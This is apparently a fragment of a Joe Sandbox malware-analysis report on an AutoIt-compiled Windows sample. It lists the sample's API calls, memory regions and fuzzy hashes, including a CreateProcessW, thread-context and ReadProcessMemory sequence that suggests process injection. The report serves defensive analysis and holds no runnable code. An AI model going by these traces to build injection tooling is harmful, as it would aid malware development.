                                                                      • _memset.LIBCMT ref: 005144CF
                                                                        • Part of subcall function 0051407C: _memset.LIBCMT ref: 005140FC
                                                                        • Part of subcall function 0051407C: _wcscpy.LIBCMT ref: 00514150
                                                                        • Part of subcall function 0051407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00514160
                                                                      • KillTimer.USER32(?,00000001,?,?), ref: 00514524
                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00514533
                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0054D4B9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                      • String ID:
                                                                      • API String ID: 1378193009-0
                                                                      • Opcode ID: c70ece3c86238110236bd72de48842237cea863d571b311ecddc60d0e6fa5759
                                                                      • Instruction ID: c6871bd3994b495e5771c788031296d020654621a5ee57969a235d1461c40e66
                                                                      • Opcode Fuzzy Hash: c70ece3c86238110236bd72de48842237cea863d571b311ecddc60d0e6fa5759
                                                                      • Instruction Fuzzy Hash: EA21C5745047849FFB328B249859BE6BFFCBB15318F04049EE69E96281D3B42988DB51
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID: AU3!P/Z$EA06
                                                                      • API String ID: 4104443479-4150073145
                                                                      • Opcode ID: 93d0b4013fdc4460a7789af4803e3b9c654491734ad7bdf8d01e878c59979f5b
                                                                      • Instruction ID: 3bd00a317899ec60b015014202242e767065fe2166c95f3d71b1100905eb2cb6
                                                                      • Opcode Fuzzy Hash: 93d0b4013fdc4460a7789af4803e3b9c654491734ad7bdf8d01e878c59979f5b
                                                                      • Instruction Fuzzy Hash: 7E41A031A0415957FF219B64E8557FE7FB2BB85300F286875EC829B282D6305DC48BA2
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 0054EA39
                                                                      • GetOpenFileNameW.COMDLG32(?), ref: 0054EA83
                                                                        • Part of subcall function 00514750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00514743,?,?,005137AE,?), ref: 00514770
                                                                        • Part of subcall function 00530791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 005307B0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Name$Path$FileFullLongOpen_memset
                                                                      • String ID: X
                                                                      • API String ID: 3777226403-3081909835
                                                                      • Opcode ID: 6239e3f3c11098109dbb8c697cb8b51de7372b51983f6d62901e529d99b5b5ff
                                                                      • Instruction ID: 7a897adcdea16c2934624b12a8538c97a1b8d7d1edd3beaa63886cb96948d3e7
                                                                      • Opcode Fuzzy Hash: 6239e3f3c11098109dbb8c697cb8b51de7372b51983f6d62901e529d99b5b5ff
                                                                      • Instruction Fuzzy Hash: DD21C370A042599BDF019FD8C849BEE7FF8BF88714F00441AE408AB241DBB459898FA1
                                                                      APIs
                                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 005798F8
                                                                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0057990F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Temp$FileNamePath
                                                                      • String ID: aut
                                                                      • API String ID: 3285503233-3010740371
                                                                      • Opcode ID: 0889c28a064121ac20f3bba7a79f07e4a640782dc74266b80d55c2bda8e8fe58
                                                                      • Instruction ID: 002da8be18558dc2bab42ec0d9cd7ffa5a499f7c121a8a2a04dfc4b3805ec4bb
                                                                      • Opcode Fuzzy Hash: 0889c28a064121ac20f3bba7a79f07e4a640782dc74266b80d55c2bda8e8fe58
                                                                      • Instruction Fuzzy Hash: C5D05E7954030DABDF509BA0DC0EFAA7B3CE714700F0006B2BA54D10A1EAB095989B91
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 234d2b0bd760d0ccf13a2949cb0296867d555c247442cae0861d516d9eade245
                                                                      • Instruction ID: a03c959fab01b7420a0cc34ef0db043f90543f2093d8c9df809056df8ac67b86
                                                                      • Opcode Fuzzy Hash: 234d2b0bd760d0ccf13a2949cb0296867d555c247442cae0861d516d9eade245
                                                                      • Instruction Fuzzy Hash: 9EF123706083419FDB14EF28C485A6ABBE5FF88314F14892EF899AB251D730E945CF92
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00514370
                                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00514415
                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00514432
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: IconNotifyShell_$_memset
                                                                      • String ID:
                                                                      • API String ID: 1505330794-0
                                                                      • Opcode ID: 44e87929f7294342410f7593df14bf2860ff0c36669bb474b3e4f644de963bcc
                                                                      • Instruction ID: 7d9cb15ba76852e34f0f2be731a587c61d4a1ad8797aa14fdc366990234f0698
                                                                      • Opcode Fuzzy Hash: 44e87929f7294342410f7593df14bf2860ff0c36669bb474b3e4f644de963bcc
                                                                      • Instruction Fuzzy Hash: 7C313EB05057019FD721DF24D8856EBBFF8FB58309F000D2EE59AC6251E771A988DB52
                                                                      APIs
                                                                      • __FF_MSGBANNER.LIBCMT ref: 00535733
                                                                        • Part of subcall function 0053A16B: __NMSG_WRITE.LIBCMT ref: 0053A192
                                                                        • Part of subcall function 0053A16B: __NMSG_WRITE.LIBCMT ref: 0053A19C
                                                                      • __NMSG_WRITE.LIBCMT ref: 0053573A
                                                                        • Part of subcall function 0053A1C8: GetModuleFileNameW.KERNEL32(00000000,005D33BA,00000104,?,00000001,00000000), ref: 0053A25A
                                                                        • Part of subcall function 0053A1C8: ___crtMessageBoxW.LIBCMT ref: 0053A308
                                                                        • Part of subcall function 0053309F: ___crtCorExitProcess.LIBCMT ref: 005330A5
                                                                        • Part of subcall function 0053309F: ExitProcess.KERNEL32 ref: 005330AE
                                                                        • Part of subcall function 00538B28: __getptd_noexit.LIBCMT ref: 00538B28
                                                                      • RtlAllocateHeap.NTDLL(00FF0000,00000000,00000001,00000000,?,?,?,00530DD3,?), ref: 0053575F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                      • String ID:
                                                                      • API String ID: 1372826849-0
                                                                      • Opcode ID: 69bb01cba37540af1692cf879c54b96f5a04ff8c192acfcc3ead7fd912cce2b3
                                                                      • Instruction ID: 4546e8e7074b8433f9489699b7037ed9b8c6df902796c9410095ee078ea57b33
                                                                      • Opcode Fuzzy Hash: 69bb01cba37540af1692cf879c54b96f5a04ff8c192acfcc3ead7fd912cce2b3
                                                                      • Instruction Fuzzy Hash: CE01B535241B03DAD7152734EC5AB3E7F48FBD27A1F101936F4059A191EF709C409661
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00579548,?,?,?,?,?,00000004), ref: 005798BB
                                                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00579548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 005798D1
                                                                      • CloseHandle.KERNEL32(00000000,?,00579548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 005798D8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseCreateHandleTime
                                                                      • String ID:
                                                                      • API String ID: 3397143404-0
                                                                      • Opcode ID: c0b6e3a4919a0c9335574e856af10723589ae5d763131ce31cc39cc51c5fff3c
                                                                      • Instruction ID: 869ebdcaa4987a6a32ca6390db155268068b4abe3418bb3b84a5c194dcb76972
                                                                      • Opcode Fuzzy Hash: c0b6e3a4919a0c9335574e856af10723589ae5d763131ce31cc39cc51c5fff3c
                                                                      • Instruction Fuzzy Hash: B2E08632140224B7D7211B64EC09FCA7F19EB16761F118121FB14A90E087B11515B7D8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: CALL
                                                                      • API String ID: 0-4196123274
                                                                      • Opcode ID: 2169dba4d28b63ab3f6e0e343fd6112f9d69c5fa17c342048d3e6c36ae0edd5e
                                                                      • Instruction ID: a83957d93832249604fbf7bdeab623feb40c8dc954f3bde6f7284b2a740d22e1
                                                                      • Opcode Fuzzy Hash: 2169dba4d28b63ab3f6e0e343fd6112f9d69c5fa17c342048d3e6c36ae0edd5e
                                                                      • Instruction Fuzzy Hash: 5D227874509301DFEB25DF14C494AAABFE1BF85304F15896DE88A8B362D731EC85DB82
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID:
                                                                      • API String ID: 4104443479-0
                                                                      • Opcode ID: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                                      • Instruction ID: d636d52262de42e13418aac8bc2a55fb407e73844a35fdacdf9ece9db815b6c1
                                                                      • Opcode Fuzzy Hash: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                                      • Instruction Fuzzy Hash: A13184B160460AAFD704DF6CC8D1DA9BBB9FF48310B158629E519CB291EB30E960CB90
                                                                      APIs
                                                                      • IsThemeActive.UXTHEME ref: 00514834
                                                                        • Part of subcall function 0053336C: __lock.LIBCMT ref: 00533372
                                                                        • Part of subcall function 0053336C: DecodePointer.KERNEL32(00000001,?,00514849,00567C74), ref: 0053337E
                                                                        • Part of subcall function 0053336C: EncodePointer.KERNEL32(?,?,00514849,00567C74), ref: 00533389
                                                                        • Part of subcall function 005148FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00514915
                                                                        • Part of subcall function 005148FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0051492A
                                                                        • Part of subcall function 00513B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00513B68
                                                                        • Part of subcall function 00513B3A: IsDebuggerPresent.KERNEL32 ref: 00513B7A
                                                                        • Part of subcall function 00513B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,005D52F8,005D52E0,?,?), ref: 00513BEB
                                                                        • Part of subcall function 00513B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00513C6F
                                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00514874
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                      • String ID:
                                                                      • API String ID: 1438897964-0
                                                                      • Opcode ID: 3081ea1fc30dca86b64d2b265efb3fc2e9af3705e230c54bc4055494923ec2c9
                                                                      • Instruction ID: 237e005c2b52ef835b4299ff1e6e44af73b8355865e4f3845f5a127faddad4b6
                                                                      • Opcode Fuzzy Hash: 3081ea1fc30dca86b64d2b265efb3fc2e9af3705e230c54bc4055494923ec2c9
                                                                      • Instruction Fuzzy Hash: 4B118C71909302ABDB10DF68D84994EBFE8FBE9750F10491BF040832B1EB70958DDB92
                                                                      APIs
                                                                        • Part of subcall function 0053571C: __FF_MSGBANNER.LIBCMT ref: 00535733
                                                                        • Part of subcall function 0053571C: __NMSG_WRITE.LIBCMT ref: 0053573A
                                                                        • Part of subcall function 0053571C: RtlAllocateHeap.NTDLL(00FF0000,00000000,00000001,00000000,?,?,?,00530DD3,?), ref: 0053575F
                                                                      • std::exception::exception.LIBCMT ref: 00530DEC
                                                                      • __CxxThrowException@8.LIBCMT ref: 00530E01
                                                                        • Part of subcall function 0053859B: RaiseException.KERNEL32(?,?,?,005C9E78,00000000,?,?,?,?,00530E06,?,005C9E78,?,00000001), ref: 005385F0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                      • String ID:
                                                                      • API String ID: 3902256705-0
                                                                      • Opcode ID: 6ffb84190be9b2a79c9c0c8f3f2b86fe350fbd279e517034ab133af1480785d3
                                                                      • Instruction ID: 4580026376e6c36b88fd0308f1f0be7ccfbcf7b4c1f649d4d3104b2f2e64cd0e
                                                                      • Opcode Fuzzy Hash: 6ffb84190be9b2a79c9c0c8f3f2b86fe350fbd279e517034ab133af1480785d3
                                                                      • Instruction Fuzzy Hash: 7AF0F43150031A66CB14BAD8EC1AAEE7FECBF41310F000829F814A6982EF709A41D2D1
                                                                      APIs
                                                                        • Part of subcall function 00538B28: __getptd_noexit.LIBCMT ref: 00538B28
                                                                      • __lock_file.LIBCMT ref: 005353EB
                                                                        • Part of subcall function 00536C11: __lock.LIBCMT ref: 00536C34
                                                                      • __fclose_nolock.LIBCMT ref: 005353F6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                      • String ID:
                                                                      • API String ID: 2800547568-0
                                                                      • Opcode ID: 6f4fe1dd07cbe718f4c54ff8c9ff761a99746203da1202abaeec26be6c624c47
                                                                      • Instruction ID: c5d634cee9efd64d004126638997187d5e29ea5053b75242e22b301bd9ae0f5b
                                                                      • Opcode Fuzzy Hash: 6f4fe1dd07cbe718f4c54ff8c9ff761a99746203da1202abaeec26be6c624c47
                                                                      • Instruction Fuzzy Hash: DEF0BB71801B069ADB15BF7598097BD7FE07F81374F259908B424AB1C1DFFC49415B51
                                                                      APIs
                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 01035A23
                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01035AB9
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01035ADB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1302191664.0000000001033000.00000040.00000020.00020000.00000000.sdmp, Offset: 01033000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1033000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 2438371351-0
                                                                      • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                      • Instruction ID: 3c08d7ae84fe226cdea0e4503776887bf5723a8bc8dc5e6dd6957e759efa27bf
                                                                      • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                      • Instruction Fuzzy Hash: 4712DF24E24658C6EB24DF64D8507DEB272EF68300F1090E9910DEB7A5E77A4F81CF5A
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                      • Instruction ID: 15aab9717a086c24212853aba250c1470fe2fc1683b3d8774b6d903380f90f6c
                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                      • Instruction Fuzzy Hash: 4931D570A002099BC719DF58C4A4A69FBA6FB59300F64A7A5E80ACB391D731EDD1DBC0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ClearVariant
                                                                      • String ID:
                                                                      • API String ID: 1473721057-0
                                                                      • Opcode ID: 811bcf4ad6b32ad8d5f826472a404708c540b3fa30f8a2214e4089323d6a0ccb
                                                                      • Instruction ID: 4670d411b869e0a7b8958d7f35a1c8a61a26342e381a16f6c6e3c44feacf155c
                                                                      • Opcode Fuzzy Hash: 811bcf4ad6b32ad8d5f826472a404708c540b3fa30f8a2214e4089323d6a0ccb
                                                                      • Instruction Fuzzy Hash: 2E4106746043519FEB15DF14C458B5ABFE1BF85318F0988ACE8998B362C732EC85CB92
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID:
                                                                      • API String ID: 4104443479-0
                                                                      • Opcode ID: c98837653a9d4ea4f902425dcbb39982046c5a0ca5d72332fe2934ac4061c3b5
                                                                      • Instruction ID: 151ce1db5a8526994f8e732b0328f2288f82a4184f33093f84aa9b155d55b97e
                                                                      • Opcode Fuzzy Hash: c98837653a9d4ea4f902425dcbb39982046c5a0ca5d72332fe2934ac4061c3b5
                                                                      • Instruction Fuzzy Hash: 07213872608A09EBEB144F55EC86BE97FB8FB64355F20886DE485C5090FB30D4D0E745
                                                                      APIs
                                                                        • Part of subcall function 00514BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00514BEF
                                                                        • Part of subcall function 0053525B: __wfsopen.LIBCMT ref: 00535266
                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,005D52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00514E0F
                                                                        • Part of subcall function 00514B6A: FreeLibrary.KERNEL32(00000000), ref: 00514BA4
                                                                        • Part of subcall function 00514C70: _memmove.LIBCMT ref: 00514CBA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
